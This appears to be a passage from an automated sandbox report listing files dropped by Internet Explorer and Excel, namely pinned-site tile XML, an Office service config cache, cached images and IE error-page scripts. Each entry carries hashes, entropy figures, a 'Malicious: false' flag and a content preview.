                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):662
                                                                                                                                                                Entropy (8bit):5.136788640295428
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxvLV3N3TnWimI002EtM3MHdNMNxvLV3N3TnWimI00ObmZEtMb:2d6Nxvh3N3TSZHKd6Nxvh3N3TSZ7mb
                                                                                                                                                                MD5:4E4D5498C4A16D70F8920545C723D39D
                                                                                                                                                                SHA1:756FF5CD5B439C6E57A88C95FBD37FFB47355792
                                                                                                                                                                SHA-256:36132C63143D2A8EAC3A102D3856FB549FC7CB84E93135EED3BF4F7DAEE8FD1C
                                                                                                                                                                SHA-512:1C3C5C2485993969B33E5B446A1F054F2D62BF1A722C3D25D86C48A707A67E3F29D8F9F20B0DB5D4FE48188240259B098AB70A351A9C893D734BC7776D8A699C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):5.065918622800244
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxia/mnWimI002EtM3MHdNMNxia/mnWimI00Obd5EtMb:2d6NxkSZHKd6NxkSZ7Jjb
                                                                                                                                                                MD5:6246BDE7DF4FCDA0BC7048B74C14155A
                                                                                                                                                                SHA1:68619801854D035811ECC95366232E86F88EC39E
                                                                                                                                                                SHA-256:963EF10FA72C3FD1FA97E84ACB35B2036F2D85831120F4CB0DD8FE0F35E3269C
                                                                                                                                                                SHA-512:4D2233773E3F2D8100CE87924E1F955D5241FE8201D70D8BBD3160D35B40D76D7EF1C4F0D5C860086CB40379CF755EBE2E4544F67E9413F1BB2D48A01A9EE629
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.1489570187121005
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxhGwV3N3TnWimI002EtM3MHdNMNxhGwV3N3TnWimI00Ob8K075EtMb:2d6NxQ43N3TSZHKd6NxQ43N3TSZ7YKa/
                                                                                                                                                                MD5:29E6A94B721E07C691157F21C9DDC9F4
                                                                                                                                                                SHA1:AAF5D22B8460AE65FAE6951CCE474BAAA78FD749
                                                                                                                                                                SHA-256:80270DA4EA34E2D6AAC9B78EFDFDB551E6293BE93399D57D8D14170D778CAC40
                                                                                                                                                                SHA-512:FD749B504705AD499681166CF3DABCC6A2D10BA22A23644D71A2DFA76151DE8DE0F1927F7D527D2F19CDD524A63B46DF9D62D983F9DDC311EC537EB44D152F92
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.049251456889828
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNx0na/mnWimI002EtM3MHdNMNx0na/mnWimI00ObxEtMb:2d6Nx0fSZHKd6Nx0fSZ7nb
                                                                                                                                                                MD5:AF79916588ECEB8DE2F37596B5CFD9AB
                                                                                                                                                                SHA1:1ED4FEC5493E4A9DA9C5D24EE37B9624279DCC9B
                                                                                                                                                                SHA-256:559328BE63BF10D7AF274EA7D37BC7A4C944431F4875F85289AD9ACFC9BDAA67
                                                                                                                                                                SHA-512:3C3505ADC49063B24B2DFAA73D5FF73491F0549C4C97CDB260A55EAAD0411DCE42B9584C864B9C49427C2D79CC9CCC50C938CF6AD265A0D31CA999158063F0EC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.09118941820664
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxxa/mnWimI002EtM3MHdNMNxxa/mnWimI00Ob6Kq5EtMb:2d6NxZSZHKd6NxZSZ7ob
                                                                                                                                                                MD5:7444DAD90865D1C0D12325E671E68B5B
                                                                                                                                                                SHA1:66017F5494B746FFB2AF7DBDC1A7E0740C24B910
                                                                                                                                                                SHA-256:0C9E37AEB53CA36742B577455DCABC2E7284C0C851C080C4091CD48C97E40847
                                                                                                                                                                SHA-512:C0F9E91597E6867C0BE986362EC2AED8F3DBA83125007B91C0096DBCC8E04843E98B37643A1CF34DFF7DBEC7F26EDCEDE4EEA65EDF8C9914F4C8337D09624274
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
  Process: C:\Program Files\internet explorer\iexplore.exe
  File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
  Category: dropped
  Size (bytes): 659
  Entropy (8bit): 5.061859989595668
  Encrypted: false
  SSDEEP: 12:TMHdNMNxca/mnWimI002EtM3MHdNMNxca/mnWimI00ObVEtMb:2d6NxeSZHKd6NxeSZ7Db
  MD5: 8FEE54DFA3411F625D8ED1E88EC514B9
  SHA1: E67044B5420D89F9A7066CB99DDDC02EAEB8C8EA
  SHA-256: 8D26BD1C0E10A05AC2DEFB0654DEC4823E77C5C9CC771A1D85C70BC71BDCCE28
  SHA-512: 9C67F8E18AF4E9CA8A4F8A18DE74ADC4B62663300BCDD95211128DECB38B9F41BB3CB7C3468DD517A3948E447CAFF6138231F470D246EF336C7A0E6F96C49388
  Malicious: false
  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
  Process: C:\Program Files\internet explorer\iexplore.exe
  File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
  Category: dropped
  Size (bytes): 653
  Entropy (8bit): 5.0519975493291644
  Encrypted: false
  SSDEEP: 12:TMHdNMNxfna/mnWimI002EtM3MHdNMNxfna/mnWimI00Obe5EtMb:2d6NxHSZHKd6NxHSZ7ijb
  MD5: 128F29080C333A45A539BB3555A98792
  SHA1: A6EEE2AF178F339D9985D675700BEA704B88E3C2
  SHA-256: A0292B34ED728A07A85BD8E9E89453E4B21E2FEAC851E464E4B2198E60F26E7A
  SHA-512: 4746191CA63D7BDF4FB5C36C7416EDF4A89F648C40A5119F5F0954FF8455E33F74B97F77909CEB5DDAC903B6178775090A4419EA5C920930A94E6C149FB72E56
  Malicious: false
  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D18DB67F-C32A-4E79-9062-0C1A4F78D8FB
  Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
  File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
  Category: dropped
  Size (bytes): 134922
  Entropy (8bit): 5.369112384074001
  Encrypted: false
  SSDEEP: 1536:9cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:pEQ9DQW+ziXOe
  MD5: 202418F344CB882FA00BA969D15999F0
  SHA1: EA73964E25E6372D218265C44B6CBC7D80089119
  SHA-256: 869B61ACF54ECE951CDDD4378AF8E500E09BBD7DBAC458EBD1E5041F7F32D612
  SHA-512: FFCE0AFACCCD2F8B5C0E71268BDE9E871241AE2EDC38863121F22EDFC6274885D8B1E33010BA323609E27483EADE93AE25EFC96485F0B0F5FEEAE3A229DB35F2
  Malicious: false
  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T03:06:37">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DFF046B8.png
  Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
  File Type: PNG image data, 1038 x 657, 8-bit/color RGBA, non-interlaced
  Category: dropped
  Size (bytes): 82182
  Entropy (8bit): 7.937734438427685
  Encrypted: false
  SSDEEP: 1536:BlthHGaFc1QdzhAVSrTINQzmxUF55taYxfvrnlljQ/9o3CNdaU3OLP:rRd9AY3yQzmq55HxfznllWA6dROLP
  MD5: 65F572544B616B7638EFC2A0DEE5EF2D
  SHA1: 26964C665C300FFAEF2D77CC455C305B014B149A
  SHA-256: EFDE5EAA221B569C35140B384FC762AC48EA5EFE7F6EF8CF228448A8A6D18E4E
  SHA-512: 76B36C6BFF20B9E32471E8F6FD72E800C11DC0CDA47E3A59F3B792A1E5DBFC3CD5977AE9A3CE60E6AFEBAEAED1E82651C0FC513B98A62980744E709A3F008F2D
  Malicious: false
  Preview: .PNG........IHDR..............>......sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^.........wYzQ...H.R.. ..hb'$.......b..Gc..5.a..(.."..T....]...>g..={..wn........S..;.s.d.E..........Z.+.........X.(.999.l.r.;w..5K.././..7.]...D../-Z...;.G.)....n....u.yS......UN....i.-2{.l.1c..7OV.Xa.!..{.n......),,...9.2jI..R.^=i....>r.a..A.....8"""""........X.p..9S..n.,Z.P.]+.7o..;w.@Aff..UK222.....h@a...25..<.L9..E..f<.....Qe...Q..=.t.R......o..9s.~2....4X..p....@.....<.@....~..DDDDDT.0p@.#??_._/.O...&.I_.5k.gu..)........j.m..y..a~........?.0..[.~a.......U.....Q$;v....+o.....?^6n.XR.W8l0.5..wA.Z.R.n].g.....4l...C...N.uKd.&yy..._P.H.....A....>..nC3.......2`...q..y.W.....u.L....A-...K...!.."..|P.}Gi......)..,`:.(.}....'.,XP.W...MP..I.j......~..yK!""""".x...E.0.4i.....2u.T...a..Z...w...-[..!.q...G....y.".'...LAa..\!//."..N..y...6m....k.N...*...y.$""""".x..P..G).....mY.p.dgg....@...:u.^.z..G.mj..i..<R.5...c.....o.....|..g.Y3....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ErrorPageTemplate[1]
  Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
  File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
  Category: dropped
  Size (bytes): 2168
  Entropy (8bit): 5.207912016937144
  Encrypted: false
  SSDEEP: 24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
  MD5: F4FE1CB77E758E1BA56B8A8EC20417C5
  SHA1: F4EDA06901EDB98633A686B11D02F4925F827BF0
  SHA-256: 8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
  SHA-512: 62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
  Malicious: false
  Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\background_gradient[1]
  Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
  File Type: JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
  Category: dropped
  Size (bytes): 453
  Entropy (8bit): 5.019973044227213
  Encrypted: false
  SSDEEP: 6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
  MD5: 20F0110ED5E4E0D5384A496E4880139B
  SHA1: 51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
  SHA-256: 1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
  SHA-512: 5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
  Malicious: false
  Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\bullet[1]
  Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
  File Type: PNG image data, 15 x 15, 8-bit colormap, non-interlaced
  Category: dropped
  Size (bytes): 447
  Entropy (8bit): 7.304718288205936
  Encrypted: false
  SSDEEP: 12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
  MD5: 26F971D87CA00E23BD2D064524AEF838
  SHA1: 7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
  SHA-256: 1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
  SHA-512: C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
  Malicious: false
  Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
  Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
  File Type: PNG image data, 15 x 15, 8-bit colormap, non-interlaced
  Category: dropped
  Size (bytes): 748
  Entropy (8bit): 7.249606135668305
  Encrypted: false
  SSDEEP: 12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
  MD5: C4F558C4C8B56858F15C09037CD6625A
  SHA1: EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
  SHA-256: 39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
  SHA-512: D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
  Malicious: false
  Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
  Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
  File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
  Category: dropped
  Size (bytes): 4720
  Entropy (8bit): 5.164796203267696
  Encrypted: false
  SSDEEP: 96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
  MD5: D65EC06F21C379C87040B83CC1ABAC6B
  SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
  SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
  SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
  Malicious: false
  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
